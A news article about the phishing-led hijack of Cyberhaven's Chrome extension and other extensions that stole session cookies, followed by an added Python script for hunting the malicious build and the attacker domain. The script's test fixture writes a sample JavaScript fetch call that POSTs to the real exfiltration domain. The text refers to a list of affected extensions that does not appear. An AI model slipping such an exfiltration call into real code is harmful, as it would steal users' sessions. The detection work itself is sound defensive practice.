Original Article Text


Cybersecurity firm's Chrome extension hijacked to steal users' data

At least five Chrome extensions were compromised in a coordinated attack in which a threat actor injected code that steals sensitive information from users.

One attack was disclosed by Cyberhaven, a data loss prevention company, which alerted its customers to a breach on December 24 after a successful phishing attack on an administrator account for its Chrome Web Store listing. Among Cyberhaven's customers are Snowflake, Motorola, Canon, Reddit, AmeriHealth, Cooley, IVP, Navan, DBS, Upstart, and Kirkland & Ellis.

The hacker hijacked the employee's account and published a malicious version (24.10.4) of the Cyberhaven extension, which included code that could exfiltrate authenticated sessions and cookies to the attacker's domain (cyberhavenext[.]pro).

Cyberhaven's internal security team removed the malicious package within an hour of detecting it, the company says in an email to its customers. A clean version of the extension, v24.10.5, was published on December 26.

Apart from upgrading to the latest version, users of the Cyberhaven Chrome extension are recommended to revoke passwords that aren't FIDOv2, rotate all API tokens, and review browser logs for signs of malicious activity.

More Chrome extensions breached

Following Cyberhaven's disclosure, Nudge Security researcher Jaime Blasco took the investigation further, pivoting from the attacker's IP addresses and registered domains. According to Blasco, the malicious code snippet that let the extension receive commands from the attacker was also injected around the same time into other Chrome extensions:

Blasco found more domains that point to other potential victims, but only the extensions above were confirmed to carry the malicious code snippet.
Users of these extensions are recommended to either remove them from the browser or upgrade to a safe version published after December 26 after making sure that the publisher has learned about the security issue and fixed it. If unsure, it would be better to uninstall the extension, reset important account passwords, clear browser data, and reset browser settings to their original defaults.
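The article's remediation advice (check which extension build is installed, look for the injected code, review browser and network logs for the exfiltration domain) can be turned into a quick hunt. The script below is an added example for this page, not code from the article or from Cyberhaven. It assumes Chrome's on-disk layout of Extensions/<extension id>/<version>_0/manifest.json, matches the extension by the display name "Cyberhaven" in its manifest (the article does not give the extension ID, so the name match is an assumption), uses the version numbers and domain the article reports, and runs over constructed sample manifests and log lines rather than real telemetry.

```python
"""Hunt for the compromised Cyberhaven extension build and its exfiltration domain.

Added example, not from the article or from Cyberhaven. Indicators used:
malicious build 24.10.4, first clean build 24.10.5, domain cyberhavenext[.]pro.
"""
import json
import os
import re
import tempfile
from typing import Iterable, List, Optional, Tuple

MALICIOUS_VERSION = "24.10.4"
FIRST_SAFE_VERSION = (24, 10, 5)
# Match the domain both live and defanged so the same check works on reports.
C2_DOMAIN_RE = re.compile(r"cyberhavenext(?:\.|\[\.\])pro", re.IGNORECASE)


def parse_version(version: str) -> Tuple[int, ...]:
    """Turn a dotted Chrome extension version into a comparable tuple."""
    return tuple(int(p) if p.isdigit() else 0 for p in version.split("."))


def check_manifest(manifest: dict) -> Optional[str]:
    """Classify one manifest: None if unrelated, else malicious/outdated/ok.

    Assumption: the manifest carries a literal display name. Chrome also allows
    a localized "__MSG_..." placeholder, which this name match would miss.
    """
    name = str(manifest.get("name", ""))
    version = str(manifest.get("version", ""))
    if "cyberhaven" not in name.lower():
        return None
    if version == MALICIOUS_VERSION:
        return "malicious"
    if parse_version(version) < FIRST_SAFE_VERSION:
        return "outdated"
    return "ok"


def find_c2_references(text: str) -> List[str]:
    """Return every occurrence of the attacker domain in a blob of text."""
    return C2_DOMAIN_RE.findall(text)


def scan_extensions_dir(root: str) -> List[Tuple[str, str]]:
    """Walk an Extensions directory; report (path, verdict) findings.

    Manifests are classified by check_manifest; any .js file that references the
    exfiltration domain is reported as "c2-domain", which still catches the
    injected code if the name or version was altered.
    """
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for filename in filenames:
            path = os.path.join(dirpath, filename)
            if filename == "manifest.json":
                try:
                    with open(path, encoding="utf-8") as fh:
                        verdict = check_manifest(json.load(fh))
                except (OSError, ValueError):
                    continue
                if verdict is not None:
                    findings.append((path, verdict))
            elif filename.endswith(".js"):
                with open(path, encoding="utf-8", errors="replace") as fh:
                    if find_c2_references(fh.read()):
                        findings.append((path, "c2-domain"))
    return findings


def scan_log_lines(lines: Iterable[str]) -> List[str]:
    """Keep proxy/DNS log lines that mention the attacker domain."""
    return [line for line in lines if find_c2_references(line)]


# Constructed sample log lines for the example, not real telemetry.
SAMPLE_LOGS = [
    "2024-12-25T03:12:09Z proxy host=update.googleapis.com status=200",
    "2024-12-25T03:12:10Z dns query=cyberhavenext.pro type=A",
    "2024-12-25T03:12:11Z proxy host=cyberhavenext.pro method=POST bytes=4096",
    "2024-12-25T03:13:00Z proxy host=www.cyberhaven.com status=200",
]


def demo() -> List[str]:
    """Build a throwaway Extensions tree from constructed manifests and scan it."""
    with tempfile.TemporaryDirectory() as root:
        fixtures = {  # hypothetical extension IDs "aaaa" and "bbbb"
            "aaaa/24.10.4_0/manifest.json": {"name": "Cyberhaven", "version": "24.10.4"},
            "bbbb/1.2.3_0/manifest.json": {"name": "Some Other Extension", "version": "1.2.3"},
        }
        for rel, manifest in fixtures.items():
            full = os.path.join(root, rel)
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, "w", encoding="utf-8") as fh:
                json.dump(manifest, fh)
        # Constructed stand-in for an injected script calling home.
        with open(os.path.join(root, "aaaa/24.10.4_0/bg.js"), "w", encoding="utf-8") as fh:
            fh.write('fetch("https://cyberhavenext.pro/collect", {method: "POST"});\n')
        return sorted(verdict for _, verdict in scan_extensions_dir(root))


if __name__ == "__main__":
    print(demo())                      # ['c2-domain', 'malicious']
    print(scan_log_lines(SAMPLE_LOGS))
```

Point scan_extensions_dir at a real profile (on Linux, ~/.config/google-chrome/Default/Extensions) to check a workstation; a "c2-domain" hit on a build other than 24.10.4, or on an extension that is not Cyberhaven's, is exactly the signal that the same snippet was injected elsewhere, which is what Blasco's pivot found.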

Daily Brief Summary

CYBERCRIME // Cyberattack Targets Chrome Extensions, Compromises User Data

Cybersecurity firm Cyberhaven announced a breach involving its Chrome extension after an administrator's account was phished.

The compromised extension version 24.10.4 contained code that enabled data theft from users by exfiltrating authenticated sessions and cookies.

The malicious package was removed within an hour of its detection, and a safe version (24.10.5) was released shortly after.

The attack affected other Chrome extensions as well, with similar malicious code snippets found by Nudge Security researcher Jaime Blasco.

Affected users are advised to upgrade to the latest versions of their extensions, revoke non-FIDOv2 passwords, rotate API tokens, and review browser logs for signs of malicious activity.

Additional recommended actions for users include uninstalling questionable extensions, resetting important passwords, clearing browser data, and restoring default browser settings.

High-profile Cyberhaven clients such as Snowflake, Motorola, Canon, and Reddit, among others, were potentially impacted by this security breach.